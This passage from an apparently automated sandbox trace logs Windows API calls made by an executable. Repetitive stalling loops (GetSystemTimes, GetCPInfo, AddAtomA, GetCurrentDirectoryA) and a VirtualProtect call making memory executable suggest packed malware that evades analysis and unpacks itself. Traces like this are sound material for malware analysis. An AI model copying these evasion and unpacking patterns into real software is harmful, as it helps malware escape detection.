out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.497] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.497] GetACP () returned 0x4e4 [0045.497] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.497] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.497] GetACP () returned 0x4e4 [0045.497] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.497] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.497] GetACP () returned 0x4e4 [0045.497] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.497] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.498] GetACP () returned 0x4e4 [0045.498] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.498] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.498] GetACP () returned 0x4e4 [0045.498] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.498] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.498] GetACP () returned 0x4e4 [0045.498] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.498] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.498] GetACP () returned 0x4e4 [0045.498] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.498] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.498] GetACP () returned 0x4e4 [0045.498] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.498] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.498] GetACP () returned 0x4e4 [0045.498] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.498] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.498] GetACP () returned 0x4e4 [0045.498] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.498] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.498] GetACP () returned 0x4e4 [0045.498] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.498] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.498] GetACP () returned 0x4e4 [0045.498] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.498] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.498] GetACP () returned 0x4e4 [0045.499] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.499] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.499] GetACP () returned 0x4e4 [0045.499] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.499] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.499] GetACP () returned 0x4e4 [0045.499] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.499] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.499] GetACP () returned 0x4e4 [0045.499] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.499] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.499] GetACP () returned 0x4e4 [0045.499] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.499] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.499] GetACP () returned 0x4e4 [0045.499] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.499] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.499] GetACP () returned 0x4e4 [0045.499] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.499] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.499] GetACP () returned 0x4e4 [0045.499] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.499] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.499] GetACP () returned 0x4e4 [0045.499] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.499] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.499] GetACP () returned 0x4e4 [0045.500] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.500] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.500] GetACP () returned 0x4e4 [0045.500] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.500] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.500] GetACP () returned 0x4e4 [0045.500] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.500] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.500] GetACP () returned 0x4e4 [0045.500] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.500] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.500] GetACP () returned 0x4e4 [0045.500] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.500] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.500] GetACP () returned 0x4e4 [0045.500] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.500] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.500] GetACP () returned 0x4e4 [0045.500] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.500] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.500] GetACP () returned 0x4e4 [0045.500] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.500] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.500] GetACP () returned 0x4e4 [0045.500] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.500] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.501] GetACP () returned 0x4e4 [0045.501] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.501] GetACP () returned 0x4e4 [0045.501] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.501] GetACP () returned 0x4e4 [0045.501] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.501] GetACP () returned 0x4e4 [0045.501] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.501] GetACP () returned 0x4e4 [0045.501] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.501] GetACP () returned 0x4e4 [0045.501] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.501] GetACP () returned 0x4e4 [0045.501] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.501] GetACP () returned 0x4e4 [0045.501] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.501] GetACP () returned 0x4e4 [0045.501] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.501] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.501] GetACP () returned 0x4e4 [0045.502] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.502] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.502] GetACP () returned 0x4e4 [0045.502] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.502] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.502] GetACP () returned 0x4e4 [0045.502] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.502] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.502] GetACP () returned 0x4e4 [0045.502] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.502] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.502] GetACP () returned 0x4e4 [0045.502] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.502] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.502] GetACP () returned 0x4e4 [0045.502] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.502] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.502] GetACP () returned 0x4e4 [0045.502] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.502] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.502] GetACP () returned 0x4e4 [0045.502] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.502] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.502] GetACP () returned 0x4e4 [0045.502] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.502] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.502] GetACP () returned 0x4e4 [0045.502] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.503] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.503] GetACP () returned 0x4e4 [0045.503] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.503] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.503] GetACP () returned 0x4e4 [0045.503] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.503] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.503] GetACP () returned 0x4e4 [0045.503] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.503] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.503] GetACP () returned 0x4e4 [0045.503] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.503] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.503] GetACP () returned 0x4e4 [0045.503] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.503] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.503] GetACP () returned 0x4e4 [0045.604] VirtualProtect (in: lpAddress=0x315ac0, dwSize=0xf2eb, flNewProtect=0x40, lpflOldProtect=0x43ad04 | out: lpflOldProtect=0x43ad04*=0x4) returned 1 [0045.604] AddAtomA (lpString=0x0) returned 0x0 [0045.605] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.605] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.605] AddAtomA (lpString=0x0) returned 0x0 [0045.605] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.605] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.605] AddAtomA (lpString=0x0) returned 0x0 [0045.605] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.605] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.605] AddAtomA (lpString=0x0) returned 0x0 [0045.605] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.605] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.605] AddAtomA (lpString=0x0) returned 0x0 [0045.605] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.605] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.605] AddAtomA (lpString=0x0) returned 0x0 [0045.605] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.605] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.605] AddAtomA (lpString=0x0) returned 0x0 [0045.605] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.605] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.605] AddAtomA (lpString=0x0) returned 0x0 [0045.605] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.606] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.606] AddAtomA (lpString=0x0) returned 0x0 [0045.606] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.606] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.606] AddAtomA (lpString=0x0) returned 0x0 [0045.606] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.606] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.606] AddAtomA (lpString=0x0) returned 0x0 [0045.606] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.606] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.606] AddAtomA (lpString=0x0) returned 0x0 [0045.606] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.606] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.606] AddAtomA (lpString=0x0) returned 0x0 [0045.606] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.606] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.606] AddAtomA (lpString=0x0) returned 0x0 [0045.606] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.606] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.606] AddAtomA (lpString=0x0) returned 0x0 [0045.606] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.606] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.606] AddAtomA (lpString=0x0) returned 0x0 [0045.606] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.606] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.606] AddAtomA (lpString=0x0) returned 0x0 [0045.606] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.606] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.606] AddAtomA (lpString=0x0) returned 0x0 [0045.606] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.606] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.606] AddAtomA (lpString=0x0) returned 0x0 [0045.606] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.606] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.607] AddAtomA (lpString=0x0) returned 0x0 [0045.607] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.607] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.607] AddAtomA (lpString=0x0) returned 0x0 [0045.607] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.607] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.607] AddAtomA (lpString=0x0) returned 0x0 [0045.607] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.607] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.607] AddAtomA (lpString=0x0) returned 0x0 [0045.607] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.607] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.607] AddAtomA (lpString=0x0) returned 0x0 [0045.607] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.607] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.607] AddAtomA (lpString=0x0) returned 0x0 [0045.607] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.607] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.607] AddAtomA (lpString=0x0) returned 0x0 [0045.607] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.607] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.607] AddAtomA (lpString=0x0) returned 0x0 [0045.607] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.607] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.607] AddAtomA (lpString=0x0) returned 0x0 [0045.607] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.607] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.607] AddAtomA (lpString=0x0) returned 0x0 [0045.607] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.607] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.607] AddAtomA (lpString=0x0) returned 0x0 [0045.607] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.607] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.607] AddAtomA (lpString=0x0) returned 0x0 [0045.608] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0045.608] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0045.608] AddAtomA (lpString=0x0) returned 0x0 